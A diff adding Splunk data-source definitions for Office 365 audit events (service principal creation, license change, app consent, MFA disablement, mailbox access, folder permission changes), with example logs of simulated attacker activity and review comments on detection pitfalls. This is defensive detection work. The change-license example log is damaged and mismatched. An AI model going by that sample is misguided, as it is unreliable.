+ "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72",
+ "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User",
+ "Type": 2}, {"ID": "user2@contoso.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9",
+ "Type": 3}], "TargetContextId": "48203edf-5d2c-45f2-8123-a368cc8b0e51"}'
diff --git a/data_sources/o365_add_service_principal_.yml b/data_sources/o365_add_service_principal_.yml
new file mode 100644
index 0000000000..de75175eb5
--- /dev/null
+++ b/data_sources/o365_add_service_principal_.yml
@@ -0,0 +1,116 @@
+name: O365 Add service principal.
+id: 9c1ef9f5-bc30-4a47-a1bd-cb34484ee778
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Add service principal.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2024-02-07T22:31:14", "Id": "f624ed92-b4a2-4d42-aa8b-20a261d06b7f",
+ "Operation": "Add service principal.", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "e06366ca-8489-4748-b6a2-d7e4332f45c1",
+ "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+ (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0
+ Safari/537.36\",\"AppId\":\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"}"}, {"Name":
+ "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties":
+ [{"Name": "AccountEnabled", "NewValue": "[\r\n true\r\n]", "OldValue": "[]"}, {"Name":
+ "AppPrincipalId", "NewValue": "[\r\n \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]",
+ "OldValue": "[]"}, {"Name": "DisplayName", "NewValue": "[\r\n \"Malicious11\"\r\n]",
+ "OldValue": "[]"}, {"Name": "ServicePrincipalName", "NewValue": "[\r\n \"e06366ca-8489-4748-b6a2-d7e4332f45c1\"\r\n]",
+ "OldValue": "[]"}, {"Name": "Credential", "NewValue": "[\r\n {\r\n \"CredentialType\":
+ 2,\r\n \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n \"KeyGroupId\":
+ \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n }\r\n]", "OldValue": "[]"}, {"Name":
+ "Included Updated Properties", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName,
+ ServicePrincipalName, Credential", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames",
+ "NewValue": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "OldValue": ""}], "Actor": [{"ID":
+ "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E",
+ "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f",
+ "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User",
+ "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId":
+ "ea473f15-64b3-435a-a885-6ee3908919e2", "IntraSystemId": "00000000-0000-0000-0000-000000000000",
+ "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_2dedf863-ac93-4f45-87b3-e32f48145380",
+ "Type": 2}, {"ID": "2dedf863-ac93-4f45-87b3-e32f48145380", "Type": 2}, {"ID": "ServicePrincipal",
+ "Type": 2}, {"ID": "Malicious11", "Type": 1}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1",
+ "Type": 2}, {"ID": "e06366ca-8489-4748-b6a2-d7e4332f45c1", "Type": 4}], "TargetContextId":
+ "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
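Review bot: The `ModifiedProperties{}.NewValue` values in this sample are JSON-array text with embedded `\r\n` and indentation (`"[\r\n \"Malicious11\"\r\n]"` for DisplayName, the same wrapper around AppPrincipalId and ServicePrincipalName), not the bare value, and the fields list gives no hint of this. A detection doing an exact match such as `ModifiedProperties{}.NewValue="Malicious11"` would not match; a comment above `fields:` such as `# NewValue/OldValue for this operation are JSON-array strings containing CR/LF; use a wildcard or parse before comparing` would make that explicit. The Credential entry likewise nests CredentialType/KeyStoreId/KeyGroupId inside the same wrapper, which is the part a credential-addition detection would want to reach.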
diff --git a/data_sources/o365_change_user_license_.yml b/data_sources/o365_change_user_license_.yml
new file mode 100644
index 0000000000..ee0fda32fb
--- /dev/null
+++ b/data_sources/o365_change_user_license_.yml
@@ -0,0 +1,100 @@
+name: O365 Change user license.
+id: 1029a20d-3d0d-4fb9-b5e2-22ac5380b20a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Change user license.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- additionalDetails
+- app
+- authentication_service
+- change_type
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- eventtype
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-11T15:55:46", "Id": "1e39f32d-081d-4494-994a-533b57f91df7",
+ "Operation": "Change user license.", "OrganizationId": "bbad9541-eb53-4533-bcef-2b76182c3b75",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victimUser@splunkresearch.onmicrosoft.com",
+ "UserId": "evilUser@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType":
+ 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"id\":\"64c07906-cb25-4d37-b38c-a862f2e49671\",\"seq\":\"6\",\"b\":\"://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://ejpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"},{\\\\\\\"Name\\\\\\\":\\\\\\\"SPN\\\\\\\",\\\\\\\"OldValue\\\\\\\":null,\\\\\\\"NewValue\\\\\\\":\\\\\\\"Microsoft.Office365Portal;00000006-0000-0ff1-ce00-000000000000;00000006-0000-0ff1-ce00-000000000000/portal.microsoftonline.com;https://ncuportalprv-staging.office.com;https://scuportalprv-staging.office.com;https://admin.microsoft365.com;https://portal-sdf.apps.mil/;https://portal-sdf.apps.mil;https://portal.apps.mil/;https://portal.apps.mil;https://portal-sdf.office365.us/;https://portal-sdf.office365.us;https://portal.office365.us/;https://portal.office365.us;https://portal.microsoft.com;https://admin.microsoft.com;https://wusportalprv.office.com;https://auth.microsoftonline.com;https://portal.office.com;https://portal-sdf.office.com/;https://portal.office.com/;https://cp.portal.office.com/;https://scuportalprv.office.com;https://ncuportalprv.office.com;https://ncuportal.office.com;https://weuportal.office.com;https://eusportal.office.com;https://neuportal.office.com;https://scuportal.office.com;https://seaportal.office.com;https://wusportal.office.com;https://easportal.office.com;https://wjpportal.office.com;https://e
jpportal.office.com;https://nukportal.office.com;https://sukportal.office.com;https://admin-ignite.microsoft.com;https://admin-sdf.microsoft.com;https://wukportal.office.com/\\\\\\\"}]\\\",\\\"additionalDetails\\\":\\\"{\\\\\\\"User-Agent\\\\\\\":\\\\\\\"O365AdminPortal\\\\\\\"}\\\"}\",\"c\":\"6\"}"},
+ {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties":
+ [], "Actor": [{"ID": "evilUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID":
+ "1003BFFD98415B4E", "Type": 3}, {"ID": "Microsoft Office 365 Portal", "Type": 1},
+ {"ID": "00000006-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f",
+ "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User",
+ "Type": 2}], "ActorContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75", "InterSystemsId":
+ "0817f79e-f0ea-4518-9c21-7babc9a36a79", "IntraSystemId": "6ae5503d-8764-4f6f-9547-668f4b2f82ca",
+ "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72",
+ "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User",
+ "Type": 2}, {"ID": "victimUser@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID":
+ "10032002CC029AE9", "Type": 3}], "TargetContextId": "bbad9541-eb53-4533-bcef-2b76182c3b75"}'
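Review bot: The `additionalDetails` value in this example_log looks damaged rather than representative: the `"b"` member starts with `://admin.microsoft.com` (scheme cut off), the payload appears to be an SPN/portal-URL list with seven-backslash escape runs rather than anything about a license change, and the hunk header promises 100 lines while 101 are shown, the `jpportal.office.com;…` continuation lacking a `+` marker. That last point may be a rendering artefact of one very long line, but if the break exists in the file the continuation line falls outside the quoted scalar and the YAML will not load, so it is worth checking with a loader. A shorter, genuine `Change user license.` record (the `"ModifiedProperties": []` and Actor/Target members already look real) would make a more useful sample; if the blob is kept, a comment above `example_log:` noting that `additionalDetails` was captured from a different operation would avoid misleading detection authors.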
diff --git a/data_sources/o365_consent_to_application_.yml b/data_sources/o365_consent_to_application_.yml
new file mode 100644
index 0000000000..224fd31009
--- /dev/null
+++ b/data_sources/o365_consent_to_application_.yml
@@ -0,0 +1,107 @@
+name: O365 Consent to application.
+id: 0a15a464-ef51-4614-9a07-a216eb9817db
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Consent to application.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_agent_change
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-05T21:05:31", "Id": "5822e126-1fbc-4269-9ad6-4c1879cdbcf3",
+ "Operation": "Consent to application.", "OrganizationId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5",
+ "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "95106c0e-3519-450e-8e38-7f326d873454",
+ "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1,
+ "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0
+ (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0
+ Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name":
+ "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties":
+ [{"Name": "ConsentContext.IsAdminConsent", "NewValue": "True", "OldValue": ""},
+ {"Name": "ConsentContext.IsAppOnly", "NewValue": "False", "OldValue": ""}, {"Name":
+ "ConsentContext.OnBehalfOfAll", "NewValue": "True", "OldValue": ""}, {"Name": "ConsentContext.Tags",
+ "NewValue": "", "OldValue": ""}, {"Name": "ConsentAction.Permissions", "NewValue":
+ "[] => [[Id: r2KtIS6Zn0q2wWeqbIputLSZcc5Sj_NGtUtP2B3pYeI, ClientId: 21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4,
+ PrincipalId: , ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: AllPrincipals,
+ Scope: User.Read, CreatedDateTime: , LastModifiedDateTime ]]; ", "OldValue": ""},
+ {"Name": "TargetId.ServicePrincipalNames", "NewValue": "95106c0e-3519-450e-8e38-7f326d873454",
+ "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5},
+ {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
+ "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID":
+ "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}],
+ "ActorContextId": "9c00a473-1b2c-4bc2-9215-84df3f57aee5", "InterSystemsId": "e0fb6206-12db-4fdf-bf52-699b254124d3",
+ "IntraSystemId": "897d35e6-e2dc-455e-ba65-e6d58adae01f", "SupportTicketId": "",
+ "Target": [{"ID": "ServicePrincipal_21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type":
+ 2}, {"ID": "21ad62af-992e-4a9f-b6c1-67aa6c8a6eb4", "Type": 2}, {"ID": "ServicePrincipal",
+ "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454",
+ "Type": 2}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 4}], "TargetContextId":
+ "9c00a473-1b2c-4bc2-9215-84df3f57aee5"}'
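Review bot: The `ConsentAction.Permissions` NewValue in the sample is one free-text string (`[] => [[Id: …, ClientId: …, ConsentType: AllPrincipals, Scope: User.Read, …]]`), so the attributes a consent-grant detection cares about—`Scope`, `ConsentType`, `ResourceId`—are not separate fields, and the fields list shows no extraction for them. A comment above `fields:` such as `# Scope/ConsentType/ResourceId exist only inside ModifiedProperties{}.NewValue for ConsentAction.Permissions; extract with rex before filtering on scopes` would tell a detection author what to expect. `ConsentContext.IsAdminConsent` and `ConsentContext.OnBehalfOfAll` are likewise the strings `"True"`/`"False"`, not booleans, which matters for exact-match filters.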
diff --git a/data_sources/o365_disable_strong_authentication_.yml b/data_sources/o365_disable_strong_authentication_.yml
new file mode 100644
index 0000000000..a3f8bf8f8f
--- /dev/null
+++ b/data_sources/o365_disable_strong_authentication_.yml
@@ -0,0 +1,99 @@
+name: O365 Disable Strong Authentication.
+id: 235381c4-382a-4183-b818-a51c3ce12187
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 Disable Strong Authentication.
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- ActorContextId
+- ActorIpAddress
+- Actor{}.ID
+- Actor{}.Type
+- AzureActiveDirectoryEventType
+- ClientIP
+- CreationTime
+- ExtendedProperties{}.Name
+- ExtendedProperties{}.Value
+- Id
+- InterSystemsId
+- IntraSystemId
+- ModifiedProperties{}.Name
+- ModifiedProperties{}.NewValue
+- ModifiedProperties{}.OldValue
+- ObjectId
+- Operation
+- OrganizationId
+- RecordType
+- ResultStatus
+- SupportTicketId
+- TargetContextId
+- Target{}.ID
+- Target{}.Type
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- additionalDetails
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- event_type
+- extendedAuditEventCategory
+- extended_properties
+- host
+- index
+- linecount
+- object
+- punct
+- record_type
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID":
+ "10037FFEA938FB92", "Type": 3}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484",
+ "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User",
+ "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress":
+ "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2020-12-15T22:35:20",
+ "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory",
+ "Value": "User"}], "Id": "a5aea9c5-b879-495a-b764-119b2bd54d80", "InterSystemsId":
+ "9d18b521-23df-4130-99e2-1ff2eee13333", "IntraSystemId": "7d96ab40-6e16-48e5-bf78-677c89683775",
+ "ModifiedProperties": [{"Name": "StrongAuthenticationRequirement", "NewValue": "[]",
+ "OldValue": "[\r\n {\r\n \"RelyingParty\": \"*\",\r\n \"State\": 0,\r\n \"RememberDevicesNotIssuedBefore\":
+ \"2020-12-15T20:47:57+00:00\"\r\n }\r\n]"}, {"Name": "Included Updated Properties",
+ "NewValue": "StrongAuthenticationRequirement", "OldValue": ""}], "ObjectId": "rodsoto@rodsoto.onmicrosoft.com",
+ "Operation": "Disable Strong Authentication.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID":
+ "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484",
+ "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "rodsoto@rodsoto.onmicrosoft.com",
+ "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08",
+ "UserId": "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com",
+ "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
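Review bot: `ActorIpAddress` and `ClientIP` are both the empty string in this sample (the `"ActorIpAddress": ""` and `"ClientIP": ""` members) and no `src`/`src_ip` CIM field is listed, so a detection on this source that requires a source address would drop real events; a comment above `fields:` such as `# ActorIpAddress/ClientIP are frequently empty for this operation; do not require a source address in detections` would prevent that. The signal in the sample is `StrongAuthenticationRequirement` going from a populated array in OldValue (`"RelyingParty": "*"`) to `"[]"` in NewValue; stating that in `description` instead of the placeholder `Data source object for O365 Disable Strong Authentication.` would make the source self-explanatory.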
diff --git a/data_sources/o365_mailitemsaccessed.yml b/data_sources/o365_mailitemsaccessed.yml
new file mode 100644
index 0000000000..25a06ee957
--- /dev/null
+++ b/data_sources/o365_mailitemsaccessed.yml
@@ -0,0 +1,94 @@
+name: O365 MailItemsAccessed
+id: 3d5188eb-341a-4b46-9caa-aade4047d027
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 MailItemsAccessed
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- AppId
+- ClientAppId
+- ClientIPAddress
+- ClientInfoString
+- CreationTime
+- ExternalAccess
+- Folders{}.FolderItems{}.InternetMessageId
+- Folders{}.FolderItems{}.SizeInBytes
+- Folders{}.Id
+- Folders{}.Path
+- Id
+- InternalLogonType
+- IsThrottled
+- LogonType
+- LogonUserSid
+- MailAccessType
+- MailboxGuid
+- MailboxOwnerSid
+- MailboxOwnerUPN
+- Operation
+- OperationCount
+- OperationProperties{}.Name
+- OperationProperties{}.Value
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- RecordType
+- ResultStatus
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- app
+- authentication_service
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc
+- host
+- index
+- linecount
+- punct
+- signature
+- source
+- sourcetype
+- splunk_server
+- status
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2024-02-01T16:07:34", "Id": "9cef02e9-4bfa-4c73-be7d-9dad68b9cea8",
+ "Operation": "MailItemsAccessed", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+ "RecordType": 50, "ResultStatus": "Succeeded", "UserKey": "100320030DF47B14", "UserType":
+ 0, "Version": 1, "Workload": "Exchange", "UserId": "user15@splunkresearch.onmicrosoft.com",
+ "AppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b", "ClientAppId": "47629505-c2b6-4a80-adb1-9b3a3d233b7b",
+ "ClientIPAddress": "120.1.121.35", "ClientInfoString": "Client=WebServices;ExchangeWebServicesProxy/CrossSite/EXCH/15.20.7249.024/python-requests/2.25.1[AppId=47629505-c2b6-4a80-adb1-9b3a3d233b7b];",
+ "ExternalAccess": false, "InternalLogonType": 0, "LogonType": 0, "LogonUserSid":
+ "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxGuid": "7cfcc8fc-0d4a-4e1c-9592-dbb3de1e3859",
+ "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-49307764", "MailboxOwnerUPN":
+ "user15@splunkresearch.onmicrosoft.com", "OperationProperties": [{"Name": "MailAccessType",
+ "Value": "Bind"}, {"Name": "IsThrottled", "Value": "False"}], "OrganizationName":
+ "splunkresearch.onmicrosoft.com", "OriginatingServer": "CH0PR18MB5530 (15.20.4200.000)\r\n",
+ "Folders": [{"FolderItems": [{"InternetMessageId": "",
+ "SizeInBytes": 44329}, {"InternetMessageId": "",
+ "SizeInBytes": 44304}, {"InternetMessageId": "",
+ "SizeInBytes": 44572}, {"InternetMessageId": "",
+ "SizeInBytes": 245068}], "Id": "LgAAAAC0AxwgOj/BRq9Bs1bhMPw/AQDh+UNSDzeHSLWfq+fr83BDAAAAAAEMAAAB",
+ "Path": "\\Inbox"}], "OperationCount": 4}'
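Review bot: `MailAccessType` and `IsThrottled` are listed as top-level fields, but in the sample they exist only as `Name`/`Value` pairs inside `OperationProperties[]` (`{"Name": "MailAccessType", "Value": "Bind"}, {"Name": "IsThrottled", "Value": "False"}`); whether the add-on promotes them to top-level fields is not visible here and is worth confirming, since a detection filtering on `MailAccessType=Sync` would otherwise never match. `IsThrottled` also deserves a comment because, per Microsoft's documentation of this record type, a throttled record means later accesses in that window were not audited and `OperationCount` is then a lower bound; `# IsThrottled=True means later accesses in the window were not audited; treat OperationCount as a lower bound` would capture it. The `OriginatingServer` value also ends in `\r\n`, which an exact-match filter on that field would need to allow for.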
diff --git a/data_sources/o365_modifyfolderpermissions.yml b/data_sources/o365_modifyfolderpermissions.yml
new file mode 100644
index 0000000000..60d13430ce
--- /dev/null
+++ b/data_sources/o365_modifyfolderpermissions.yml
@@ -0,0 +1,108 @@
+name: O365 ModifyFolderPermissions
+id: 0a8c1080-68c2-46d7-8324-2e7d97bb6e2f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for O365 ModifyFolderPermissions
+source: o365
+sourcetype: o365:management:activity
+separator: Operation
+supported_TA:
+- name: Splunk Add-on for Microsoft Office 365
+ url: https://splunkbase.splunk.com/app/4055
+ version: 4.5.1
+fields:
+- _time
+- AppId
+- ClientIP
+- ClientIPAddress
+- ClientInfoString
+- CreationTime
+- ExternalAccess
+- Id
+- InternalLogonType
+- Item.Id
+- Item.ParentFolder.Id
+- Item.ParentFolder.MemberRights
+- Item.ParentFolder.MemberSid
+- Item.ParentFolder.MemberUpn
+- Item.ParentFolder.Name
+- Item.ParentFolder.Path
+- LogonType
+- LogonUserSid
+- MailboxGuid
+- MailboxOwnerSid
+- MailboxOwnerUPN
+- Operation
+- OrganizationId
+- OrganizationName
+- OriginatingServer
+- RecordType
+- ResultStatus
+- SessionId
+- UserId
+- UserKey
+- UserType
+- Version
+- Workload
+- action
+- app
+- authentication_service
+- change_type
+- client_info_str
+- command
+- dataset_name
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_name
+- dvc
+- eventtype
+- host
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_id
+- punct
+- record_type
+- result
+- signature
+- source
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- status
+- tag
+- tag::eventtype
+- tenant_id
+- timeendpos
+- timestartpos
+- user
+- user_agent
+- user_id
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"CreationTime": "2023-09-07T18:19:07", "Id": "ff065c17-e638-4013-20ab-08dbafceeca1",
+ "Operation": "ModifyFolderPermissions", "OrganizationId": "e17879dd-24ec-44a6-be92-9dcbf6969220",
+ "RecordType": 2, "ResultStatus": "Succeeded", "UserKey": "10032002CC029AE9", "UserType":
+ 0, "Version": 1, "Workload": "Exchange", "ClientIP": "22.23.21.25", "UserId": "user1@contoso.onmicrosoft.com",
+ "AppId": "00000002-0000-0ff1-ce00-000000000000", "ClientIPAddress": "22.23.21.25",
+ "ClientInfoString": "Client=OWA;Action=ViaProxy", "ExternalAccess": false, "InternalLogonType":
+ 0, "LogonType": 0, "LogonUserSid": "S-1-5-21-1148582062-3132321681-773847816-45339891",
+ "MailboxGuid": "8e942cc1-73d8-4483-9def-7d9579d615a7", "MailboxOwnerSid": "S-1-5-21-1148582062-3132321681-773847816-45339891",
+ "MailboxOwnerUPN": "user1@contoso.onmicrosoft.com", "OrganizationName": "contoso.onmicrosoft.com",
+ "OriginatingServer": "BYAPR18MB2728 (15.20.4200.000)\r\n", "SessionId": "d2a5a3ba-992b-431a-9b52-8c76210d17d9",
+ "Item": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB",
+ "ParentFolder": {"Id": "LgAAAABKe+NY5HVjRYWDqaJ5IKKFAQBQ11dzmT6LS6bQbkNDtISsAAAAAAEMAAAB",
+ "MemberRights": "FreeBusySimple", "MemberSid": "S-1-1-0", "MemberUpn": "Everyone",
+ "Name": "Inbox", "Path": "\\Inbox"}}}'
